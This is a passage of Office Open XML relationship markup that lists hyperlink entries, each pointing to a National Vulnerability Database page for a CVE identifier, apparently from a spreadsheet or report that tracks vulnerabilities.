Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId3260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId3261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId3262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId3263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId3264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82392" TargetMode="External" Id="rId3265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82634" TargetMode="External" Id="rId3266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82659" TargetMode="External" Id="rId3267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82864" TargetMode="External" Id="rId3268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82872" TargetMode="External" Id="rId3269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82877" TargetMode="External" Id="rId3270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83961" TargetMode="External" Id="rId3271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84192" TargetMode="External" Id="rId3272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84204" TargetMode="External" Id="rId3273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84205" TargetMode="External" Id="rId3274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84698" TargetMode="External" Id="rId3275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84816" TargetMode="External" Id="rId3276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84817" TargetMode="External" Id="rId3277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84818" TargetMode="External" Id="rId3278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84819" TargetMode="External" Id="rId3279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84820" TargetMode="External" Id="rId3280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84989" TargetMode="External" Id="rId3281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85089" TargetMode="External" Id="rId3282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85093" TargetMode="External" Id="rId3283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85162" TargetMode="External" Id="rId3284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85163" TargetMode="External" Id="rId3285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85164" TargetMode="External" Id="rId3286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85170" TargetMode="External" Id="rId3287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85171" TargetMode="External" Id="rId3288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85389" TargetMode="External" Id="rId3289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85390" TargetMode="External" Id="rId3290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85451" TargetMode="External" Id="rId3291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85545" TargetMode="External" Id="rId3292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85578" TargetMode="External" Id="rId3293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85580" TargetMode="External" Id="rId3294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85582" TargetMode="External" Id="rId3295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85583" TargetMode="External" Id="rId3296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85590" TargetMode="External" Id="rId3297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85591" TargetMode="External" Id="rId3298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85603" TargetMode="External" Id="rId3299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85618" TargetMode="External" Id="rId3300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85624" TargetMode="External" Id="rId3301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85654" TargetMode="External" Id="rId3302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85669" TargetMode="External" Id="rId3303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85689" TargetMode="External" Id="rId3304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85692" TargetMode="External" Id="rId3305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85787" TargetMode="External" Id="rId3306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86081" TargetMode="External" Id="rId3307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86082" TargetMode="External" Id="rId3308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86091" TargetMode="External" Id="rId3309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86097" TargetMode="External" Id="rId3310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86111" TargetMode="External" Id="rId3311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86113" TargetMode="External" Id="rId3312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86116" TargetMode="External" Id="rId3313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86175" TargetMode="External" Id="rId3314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86192" TargetMode="External" Id="rId3315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86204" TargetMode="External" Id="rId3316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86255" TargetMode="External" Id="rId3317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86283" TargetMode="External" Id="rId3318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86347" TargetMode="External" Id="rId3319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86408" TargetMode="External" Id="rId3320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86713" TargetMode="External" Id="rId3321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86718" TargetMode="External" Id="rId3322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86724" TargetMode="External" Id="rId3323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86725" TargetMode="External" Id="rId3324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86726" TargetMode="External" Id="rId3325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86731" TargetMode="External" Id="rId3326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86734" TargetMode="External" Id="rId3327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86757" TargetMode="External" Id="rId3328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86758" TargetMode="External" Id="rId3329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86759" TargetMode="External" Id="rId3330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86764" TargetMode="External" Id="rId3331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86765" TargetMode="External" Id="rId3332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86766" TargetMode="External" Id="rId3333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87072" TargetMode="External" Id="rId3334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87803" TargetMode="External" Id="rId3335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87809" TargetMode="External" Id="rId3336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87818" TargetMode="External" Id="rId3337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87821" TargetMode="External" Id="rId3338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87961" TargetMode="External" Id="rId3339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87998" TargetMode="External" Id="rId3340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87999" TargetMode="External" Id="rId3341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88016" TargetMode="External" Id="rId3342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88021" TargetMode="External" Id="rId3343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88026" TargetMode="External" Id="rId3344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88027" TargetMode="External" Id="rId3345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88028" TargetMode="External" Id="rId3346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88870" TargetMode="External" Id="rId3347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88872" TargetMode="External" Id="rId3348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88873" TargetMode="External" Id="rId3349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88898" TargetMode="External" Id="rId3350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88915" TargetMode="External" Id="rId3351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88938" TargetMode="External" Id="rId3352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89011" TargetMode="External" Id="rId3353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89245" TargetMode="External" Id="rId3354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89251" TargetMode="External" Id="rId3355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89252" TargetMode="External" Id="rId3356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9331" TargetMode="External" Id="rId3357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-48564" TargetMode="External" Id="rId3358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15419" TargetMode="External" Id="rId3359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34789" TargetMode="External" Id="rId3360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40506" TargetMode="External" Id="rId3361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48711" TargetMode="External" Id="rId3362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4878" TargetMode="External" Id="rId3363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50349" TargetMode="External" Id="rId3364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52817" TargetMode="External" Id="rId3365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54467" TargetMode="External" Id="rId3366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58230" TargetMode="External" Id="rId3367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58848" TargetMode="External" Id="rId3368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61783" TargetMode="External" Id="rId3369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62653" TargetMode="External" Id="rId3370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62654" TargetMode="External" Id="rId3371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62694" TargetMode="External" Id="rId3372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62727" TargetMode="External" Id="rId3373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63387" TargetMode="External" Id="rId3374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63424" TargetMode="External" Id="rId3375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68824" TargetMode="External" Id="rId3376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68825" TargetMode="External" Id="rId3377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68837" TargetMode="External" Id="rId3378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId3379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68847" TargetMode="External" Id="rId3380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId3381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68897" TargetMode="External" Id="rId3382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69275" TargetMode="External" Id="rId3383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69279" TargetMode="External" Id="rId3384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69280" TargetMode="External" Id="rId3385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69281" TargetMode="External" Id="rId3386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId3387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69292" TargetMode="External" Id="rId3388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69299" TargetMode="External" Id="rId3389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69300" TargetMode="External" Id="rId3390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69309" TargetMode="External" Id="rId3391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69310" TargetMode="External" Id="rId3392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69311" TargetMode="External" Id="rId3393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId3394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69331" TargetMode="External" Id="rId3395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69333" TargetMode="External" Id="rId3396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69335" TargetMode="External" Id="rId3397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69341" TargetMode="External" Id="rId3398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69362" TargetMode="External" Id="rId3399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId3400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69383" TargetMode="External" Id="rId3401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69385" TargetMode="External" Id="rId3402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69388" TargetMode="External" Id="rId3403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69394" TargetMode="External" Id="rId3404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69398" TargetMode="External" Id="rId3405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69401" TargetMode="External" Id="rId3406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69404" TargetMode="External" Id="rId3407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69410" TargetMode="External" Id="rId3408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId3409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId3410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69430" TargetMode="External" Id="rId3411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69440" TargetMode="External" Id="rId3412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69441" TargetMode="External" Id="rId3413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69448" TargetMode="External" Id="rId3414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId3415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69468" TargetMode="External" Id="rId3416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69470" TargetMode="External" Id="rId3417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId3418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId3419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69488" TargetMode="External" Id="rId3420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69492" TargetMode="External" Id="rId3421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69498" TargetMode="External" Id="rId3422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69500" TargetMode="External" Id="rId3423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" 